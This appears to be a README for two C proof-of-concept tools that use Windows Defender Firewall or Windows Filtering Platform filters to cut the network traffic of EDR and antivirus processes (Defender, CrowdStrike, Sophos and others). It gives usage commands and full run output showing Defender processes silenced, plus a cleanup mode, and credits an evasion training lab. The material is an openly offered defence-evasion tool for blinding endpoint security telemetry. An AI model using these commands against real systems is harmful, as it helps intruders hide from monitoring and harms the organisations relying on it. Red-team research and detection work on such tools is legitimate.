Blocking EDRs traffic

Two tools written in C that block network traffic for blacklisted EDR processes, using either Windows Defender Firewall (WDF) or Windows Filtering Platform (WFP).

Overview

• WindowsDefenderFirewall.exe
  • Creates inbound and outbound block rules in Windows Defender Firewall for blacklisted EDR processes.
• WindowsFilteringPlatform.exe
  • Creates WFP filters that block traffic for blacklisted EDR processes. Includes a custom AppID resolution routine to obtain executable identities.
• Both tools:
  • Verify the process is running with High Integrity and SeDebugPrivilege enabled.
  • Enumerate running processes and match them against a blacklist.
  • Support a cleanup mode that removes only the rules/filters created by these PoCs.
• These tools do not disable or tamper with security products; they create network block rules/filters referencing targeted executables.

How it works (high level)

• Privilege checks: Ensures elevated integrity level and SeDebugPrivilege to enumerate processes and configure firewall/WFP.
• Process discovery: Enumerates running processes and resolves full image paths for blacklist matching.
• Blocking:
  • WDF: Adds per-app inbound/outbound block rules via the Windows Firewall COM API.
  • WFP: Adds per-app IPv4/IPv6 block filters via the WFP engine.

Supported EDRs

Currently supported EDRs and their processes include:

• Microsoft Defender Antivirus
• Microsoft Defender for Endpoint
• Elastic EDR
• BitDefender
• Cortex
• CrowdStrike
• Sentinel
• Sophos

Will add more when I get to test them. The process definitions are listed in process.c, making it easy to extend the blacklist with new entries. I haven’t fully validated blocking of telemetry being send towards the SIEM/Dashboard, but I did confirm process names from installed components.

Usage

• Compile it using Visual Studio 2022

WindowsDefenderFirewall.exe

• Use the -e parameter to block all EDR processes

PS C:\ > .\WindowsDefenderFirewall.exe
Usage: WindowsDefenderFirewall.exe -e / -d
Options:
   -e Enable  - Block blacklisted EDR processes
   -d Disable - Remove blocked firewall rules created by this tool
   -h         - Display this help message

WindowsFilteringPlatform.exe

• Use the --edr parameter to block all EDR processes
• Use the -e parameter to block a specific process

PS C:\ > .\WindowsFilteringPlatform.exe
Usage: WindowsFilteringPlatform.exe -e / -d  / --edr
Options:
   --edr          - Block traffic of blacklisted EDR processes
   -e <PROCESS>   - Block traffic of specified process
   -d             - Remove blocked firewall rules created by this tool
   -h             - Display this help message

Common scenarios

• Block all blacklisted EDR processes (WFP):

PS C:\> .\WindowsFilteringPlatform.exe --edr

• Block a single process (WFP):

PS C:\> .\WindowsFilteringPlatform.exe -e MsMpEng.exe

• Remove created rules/filters:

PS C:\> .\WindowsFilteringPlatform.exe -d
PS C:\> .\WindowsDefenderFirewall.exe -d

Example

PS C:\ > .\WindowsFilteringPlatform.exe --edr
[i] IsProcessHighIntegrity - Checking if current process is running in High Integrity
        OpenProcessToken - Retrieved handle to token 0x00000000000000AC
        GetTokenInformation1 - Retrieved 28 bytes of token information
        malloc - Allocated 28 bytes of memory at 0x0000026F0B871D60
        GetTokenInformation2 - Retrieved 28 bytes of token information at 0x0000026F0B871D60
        GetSidSubAuthority - Integrity Level: 0x3000
[+] IsProcessHighIntegrity - Process running in High Integrity

[i] BlockEDRTraffic - Blocking traffic of listed processes using Windows Filtering Platform
        GetModuleHandleW - Received handle to ntdll.dll 0x00007FFBCB420000
        GetProcAddress - Received address to NtQuerySystemInformation 0x00007FFBCB582F60
        NtQuerySystemInformation - Retrieved size in bytes for the system information: 292232
        HeapAlloc - Allocated 292232 bytes of memory for SystemProcessInformation at 0x0000026F0B879400
        NtQuerySystemInformation - Retrieved size in bytes of system information: 292232 at 0x0000026F0B879400
        HeapAlloc - Allocated 72 bytes of memory for the EDR process struct at 0x0000026F0B86ECC0
        OpenProcess - Opened handle to process "MpDefenderCoreService.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpDefenderCoreService.exe"
        OpenProcess - Opened handle to process "MsMpEng.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MsMpEng.exe"
        OpenProcess - Opened handle to process "NisSrv.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\NisSrv.exe"
        EnumerateEDRProcesses - 3 EDR processes enumerated
                Matched EDR process: "MpDefenderCoreService.exe" with PID 4288 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\mpdefendercoreservice.exe"
                Matched EDR process: "MsMpEng.exe" with PID 4332 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\msmpeng.exe"
                Matched EDR process: "NisSrv.exe" with PID 9808 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\nissrv.exe"
[i] BlockTraffic - Looping through EDR processes and creating Windows Filtering Platform filters
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B87A140
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "MpDefenderCoreService.exe" with ID 77392
        FwpmFilterAdd0 - Added IPV6 filter for "MpDefenderCoreService.exe" with ID 77393
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B87A230
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "MsMpEng.exe" with ID 77394
        FwpmFilterAdd0 - Added IPV6 filter for "MsMpEng.exe" with ID 77395
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B879ED0
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "NisSrv.exe" with ID 77396
        FwpmFilterAdd0 - Added IPV6 filter for "NisSrv.exe" with ID 77397
[+] BlockEDRTraffic - Windows Filtering Platform blocking filters for all processes have been created

PS C:\ > .\WindowsFilteringPlatform.exe -d
[i] IsProcessHighIntegrity - Checking if current process is running in High Integrity
        OpenProcessToken - Retrieved handle to token 0x00000000000000E0
        GetTokenInformation1 - Retrieved 28 bytes of token information
        malloc - Allocated 28 bytes of memory at 0x00000206BD931BB0
        GetTokenInformation2 - Retrieved 28 bytes of token information at 0x00000206BD931BB0
        GetSidSubAuthority - Integrity Level: 0x3000
[+] IsProcessHighIntegrity - Process running in High Integrity

[i] UnblockTraffic - Removing all Windows Filtering Platform rules with custom filter name "Default Outbound Block"
        FwpmEngineOpen0 - Opened handle to WFP engine 0x00000206BD93A470
        FwpmFilterCreateEnumHandle0 - Opened handle to enumerate filters 0x00000206BD939E90
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77397
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77394
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77393
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77392
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77396
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77395
[+] UnblockTraffic - Windows Filtering Platform filters have been removed

Credits

I got inspired to expand upon the tools provided in the Evasion Lab (CETP from Altered Security), taught by Saad Ahla.

The EDRSilencer project.

Features ideas

• Block a specific executable on disk (Not process)
• Block all executables in a specific directory
• Block a specific IP-address or URL (Is wildcard possible?)
• Block a list of IP-addresses or URL's
• Remotely apply WFP Filters?